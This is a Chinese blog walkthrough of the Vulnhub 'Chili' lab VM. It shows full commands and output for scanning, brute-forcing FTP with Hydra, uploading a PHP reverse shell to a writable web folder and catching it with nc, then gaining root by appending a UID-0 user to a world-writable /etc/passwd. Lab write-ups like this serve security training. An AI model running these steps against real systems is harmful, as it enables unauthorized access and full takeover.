首页 > 其他分享 >Vulnhub Chili靶机详细解题过程

Vulnhub Chili靶机详细解题过程

时间:2022-11-15 22:59:55浏览次数:52  
标签:56.179 kali 08 192.168 Vulnhub 靶机 root Chili usr

Chili

识别目标主机IP地址

本靶机存在无法从Virtualbox自动获得IP地址的问题,根据本人另文来解决该问题。

──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.60.0/16   |   Screen View: Unique Hosts                                                                                                                                                            
                                                                                                                                                                                                                                
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                                                                
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                               
 192.168.56.100  08:00:27:49:52:e5      1      60  PCS Systemtechnik GmbH                                                                                                                                                       
 192.168.56.179  08:00:27:77:88:2e      1      60  PCS Systemtechnik GmbH      

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.179

NMAP扫描

──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.179 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-15 08:25 EST
Nmap scan report for bogon (192.168.56.179)
Host is up (0.000081s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Chili
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:77:88:2E (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.44 seconds

Get Access

先看一下FTP服务,

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ ftp 192.168.56.179        
Connected to 192.168.56.179.
220 (vsFTPd 3.0.3)
Name (192.168.56.179:kali): anonymous
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed
ftp> 


目标不允许匿名服务,同时该版本的vsFTPd没有可利用的漏洞

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ curl http://192.168.56.179                                  

<html>
<body bgcolor="white">
<head>
<title>Chili</title>
<meta name="description" content="We Are Still Alive!">
<meta name="keywords" content="Chili">
<meta name="robots" content="index, follow">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="language" content="English">
</head>
<link href="https://fonts.googleapis.com/css?family=Righteous|Saira+Stencil+One&display=swap" rel="stylesheet">
<style type="text/css">
@font-face {
        font-family: 'Righteous', cursive;
        font-family: 'Saira Stencil One', cursive;
}
</style>
<center><br><br>
<img src="Chile_WEB.jpg" width="400px" height="400px"><br>
</center></body></html>

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ wget http://192.168.56.179/Chile_WEB.jpg                                                                  
--2022-11-15 08:44:58--  http://192.168.56.179/Chile_WEB.jpg
Connecting to 192.168.56.179:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 74290 (73K) [image/jpeg]
Saving to: ‘Chile_WEB.jpg’

Chile_WEB.jpg                                            100%[===============================================================================================================================>]  72.55K  --.-KB/s    in 0.001s  

2022-11-15 08:44:58 (136 MB/s) - ‘Chile_WEB.jpg’ saved [74290/74290]

                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ ls
Chile_WEB.jpg  nmap_full_scan
                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ steghide extract -sf Chile_WEB.jpg                         
Enter passphrase: 
steghide: could not extract any data with that passphrase!
                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ stegseek Chile_WEB.jpg /usr/share/wordlists/rockyou.txt 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.19% (132.4 MB)           
[!] error: Could not find a valid passphrase.

图片也没有可利用的信息。

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ curl http://192.168.56.179/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.179 Port 80</address>
</body></html>

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ gobuster dir -u http://192.168.56.179 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                       
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.179
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/15 08:46:20 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 279]
Progress: 218740 / 220561 (99.17%)===============================================================
2022/11/15 08:46:42 Finished
===============================================================
                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ nikto -h http://192.168.56.179
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.179
+ Target Hostname:    192.168.56.179
+ Target Port:        80
+ Start Time:         2022-11-15 08:46:50 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 291, size: 5aecf355f0724, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2022-11-15 08:47:40 (GMT-5) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? 

                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ dirb http://192.168.56.179                                                                           

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Nov 15 08:47:54 2022
URL_BASE: http://192.168.56.179/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.179/ ----
+ http://192.168.56.179/index.html (CODE:200|SIZE:657)                                                                                                                                                                          
+ http://192.168.56.179/server-status (CODE:403|SIZE:279)                                                                                                                                                                       
                                                                                                                                                                                                                                
-----------------
END_TIME: Tue Nov 15 08:47:56 2022
DOWNLOADED: 4612 - FOUND: 2
                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ gobuster dir -u http://192.168.56.179 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.179
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2022/11/15 08:48:56 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 657]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1101162 / 1102805 (99.85%)===============================================================
2022/11/15 08:50:56 Finished
===============================================================

目录扫描没有提取到任何有价值的信息,只能回过头来对准FTP服务了。

作者提示当觉得难以有进展的时候,想一想这个VM的名字,也就是chili

所以以chili作为用户名,Hydra破解一下ftp

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ hydra -l chili -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.179
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-15 08:54:41
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.56.179:21/
[STATUS] 288.00 tries/min, 288 tries in 00:01h, 14344111 to do in 830:06h, 16 active
[STATUS] 296.00 tries/min, 888 tries in 00:03h, 14343511 to do in 807:38h, 16 active
[STATUS] 290.43 tries/min, 2033 tries in 00:07h, 14342366 to do in 823:04h, 16 active
[STATUS] 287.07 tries/min, 4306 tries in 00:15h, 14340093 to do in 832:34h, 16 active
[21][ftp] host: 192.168.56.179   login: chili   password: a1b2c3d4
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-15 09:10:19

成功破解了FTP用户名和密码,现在登录一下ftp:

└─$ ftp 192.168.56.179
Connected to 192.168.56.179.
220 (vsFTPd 3.0.3)
Name (192.168.56.179:kali): chili
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||32717|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -alh
229 Entering Extended Passive Mode (|||58811|)
150 Here comes the directory listing.
drwxr-xr-x    3 1000     1000         4096 Sep 08  2020 .
drwxr-xr-x    3 0        0            4096 Sep 08  2020 ..
-rw-r--r--    1 1000     1000          220 Sep 07  2020 .bash_logout
-rw-r--r--    1 1000     1000         3526 Sep 07  2020 .bashrc
drwxr-xr-x    3 1000     1000         4096 Sep 08  2020 .local
-rw-r--r--    1 1000     1000          807 Sep 07  2020 .profile
226 Directory send OK.
ftp> pwd
Remote directory: /home/chili
ftp> cd /var/www
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||18710|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        0            4096 Sep 08  2020 .
drwxr-xr-x   12 0        0            4096 Sep 08  2020 ..
drwxr-xr-x    4 0        0            4096 Sep 08  2020 html
226 Directory send OK.
ftp> cd html
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||37671|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0           74290 Oct 22  2018 Chile_WEB.jpg
-rw-r--r--    1 0        0             657 Sep 08  2020 index.html
226 Directory send OK.
ftp> 

发现可以成功改变目标,可以进入到网站根目录,因此可以将php脚本上传到网站根目录

150 Here comes the directory listing.
drwxr-xr-x    4 0        0            4096 Sep 08  2020 .
drwxr-xr-x    3 0        0            4096 Sep 08  2020 ..
drwxrwxrwx    2 0        0            4096 Sep 08  2020 .nano
drwxr-xr-x    2 0        0            4096 Sep 08  2020 .vim
-rw-r--r--    1 0        0           74290 Oct 22  2018 Chile_WEB.jpg
-rw-r--r--    1 0        0             657 Sep 08  2020 index.html
226 Directory send OK.
ftp> 

.nano目录任何用户可读可写,可以放到这个目录下

ftp> cd .nano 
250 Directory successfully changed.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||35742|)
150 Ok to send data.
100% |*************************************************************************************************************************************************************************************|  5496       95.29 MiB/s    00:00 ETA
226 Transfer complete.
5496 bytes sent in 00:00 (4.15 MiB/s)
ftp> ls -alh
229 Entering Extended Passive Mode (|||13137|)
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Nov 15 17:15 .
drwxr-xr-x    4 0        0            4096 Sep 08  2020 ..
-rw-r--r--    1 1000     1000            0 Sep 08  2020 index.html
-rw-------    1 1000     1000         5496 Nov 15 17:15 shell.php
226 Directory send OK.
ftp> help
Commands may be abbreviated.  Commands are:

!               case            dir             fget            idle            mdelete         modtime         ntrans          progress        rcvbuf          rmdir           sndbuf          type
$               cd              disconnect      form            image           mdir            more            open            prompt          recv            rstatus         status          umask
account         cdup            edit            ftp             lcd             mget            mput            page            proxy           reget           runique         struct          unset
append          chmod           epsv            gate            less            mkdir           mreget          passive         put             remopts         send            sunique         usage
ascii           close           epsv4           get             lpage           mls             msend           pdir            pwd             rename          sendport        system          user
bell            cr              epsv6           glob            lpwd            mlsd            newer           pls             quit            reset           set             tenex           verbose
binary          debug           exit            hash            ls              mlst            nlist           pmlsd           quote           restart         site            throttle        xferbuf
bye             delete          features        help            macdef          mode            nmap            preserve        rate            rhelp           size            trace           ?
ftp> chmod 777 shell.php
200 SITE CHMOD command ok.
ftp> ls -alh
229 Entering Extended Passive Mode (|||30184|)
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Nov 15 17:15 .
drwxr-xr-x    4 0        0            4096 Sep 08  2020 ..
-rw-r--r--    1 1000     1000            0 Sep 08  2020 index.html
-rwxrwxrwx    1 1000     1000         5496 Nov 15 17:15 shell.php
226 Directory send OK.
ftp> 

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ curl http://192.168.56.179/.nano/shell.php


在Kali Linux上成功拿到反弹回来的shell

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.179] 35822
Linux chili 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
 17:17:26 up 54 min,  0 users,  load average: 0.00, 0.02, 0.21
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@chili:/$ 

提权

将linpeas.sh脚本上传至目标主机/tmp目录下,修改权限,并执行


╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                                                                                                                 
/dev/mqueue                                                                                                                                                                                                                       
/dev/shm
/etc/passwd
/run/lock
/run/lock/apache2
/tmp
/tmp/linpeas.sh
/var/cache/apache2/mod_cache_disk
/var/lib/php/sessions
/var/tmp
/var/www/html/.nano
/var/www/html/.nano/shell.php

Linpeas.sh脚本给出一个可疑文件,/etc/passwd可写

www-data@chili:/tmp$ ls -alh /etc/passwd
ls -alh /etc/passwd
-rw-r--rw- 1 root root 1.5K Sep  8  2020 /etc/passwd

利用Kali LInux openssl 工具生成密码:

┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ openssl passwd -1 -salt jason 123456
$1$jason$kqq2SnNAGHtj7Joa0Zlp61

www-data@chili:/tmp$ echo 'jason:$1$jason$kqq2SnNAGHtj7Joa0Zlp61:0:0:root:/root:/bin/bash' >>/etc/passwd
<j7Joa0Zlp61:0:0:root:/root:/bin/bash' >>/etc/passwd
www-data@chili:/tmp$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
chili:x:1000:1000:chili,,,:/home/chili:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
ftp:x:106:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
jason:$1$jason$kqq2SnNAGHtj7Joa0Zlp61:0:0:root:/root:/bin/bash

直接切换到Jason用户(拥有超级用户权限)

www-data@chili:/tmp$ su - jason
su - jason
Password: 123456

root@chili:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@chili:~# ls -alh
ls -alh
total 32K
drwx------  3 root root 4.0K Sep  8  2020 .
drwxr-xr-x 18 root root 4.0K Sep  7  2020 ..
-rw-------  1 root root  126 Sep  8  2020 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4.0K Sep  8  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   47 Sep  8  2020 proof.txt
-rw-r--r--  1 root root  176 Sep  8  2020 .wget-hsts
root@chili:~# cat proof.txt
cat proof.txt
Sun_CSR.Chili.af6d45da1f1181347b9e2139f23c6a5b
root@chili:~# 

成功提权!!!

标签:56.179,kali,08,192.168,Vulnhub,靶机,root,Chili,usr
From: https://www.cnblogs.com/jason-huawen/p/16894316.html

相关文章

  • Vulnhub Cherry靶机解题详细过程
    Cherry识别目标主机IP地址靶机存在无法从Virtualbox自动获取IP地址的问题,先参照本人另文解决该问题。┌──(kali㉿kali)-[~/Vulnhub/Cherry]└─$sudonetdiscover-......
  • Vulnhub Bluemoon靶机解题详细过程
    Bluemoon识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/Bluemoon]└─$sudonetdiscover-iethCurrentlyscanning:192.168.92.0/16|ScreenView:Unique......
  • Vulnhub Blogger靶机解题过程
    Blogger识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/Blogger]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.103.0/16|ScreenView:Unique......
  • Vulnhub 02 Breakout靶机解题详细过程
    02Breakout识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/02_breakout]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.74.0/16|ScreenView:Uni......
  • vulnhub靶场之Beelzebub
    准备:攻击机:虚拟机kali、本机win10。靶机:Beelzebub:1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/beelzebub/Beelzebub.zip......
  • Vulnhub Bluesky靶机解题详细过程
    Bluesky识别目标主机IP地址该靶机存在无法从VirtualBox自动获取IP的问题,解决过程见本人另文,此处不再赘述。┌──(kali㉿kali)-[~/Vulnhub/Bluesky]└─$sudonetdisc......
  • Vulnhub Victim 01靶机解题过程
    Victim01识别目标主机IP地址......
  • vulnhub靶场之DRIPPING BLUES: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:DRIPPINGBLUES:1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/drippingblues/drip......
  • Vulnhub Sundown靶机解题过程
    Sundown识别目标主机IP地址──(kali㉿kali)-[~/Vulnhub/Sundown]└─$sudonetdiscover-ieth13CapturedARPReq/Reppackets,from3hosts.Totalsize:180......
  • Vulnhub So Simple 1靶机解题过程
    SoSimple1识别目标主机IP地址┌──(kali㉿kali)-[~]└─$sudonetdiscover-ieth1......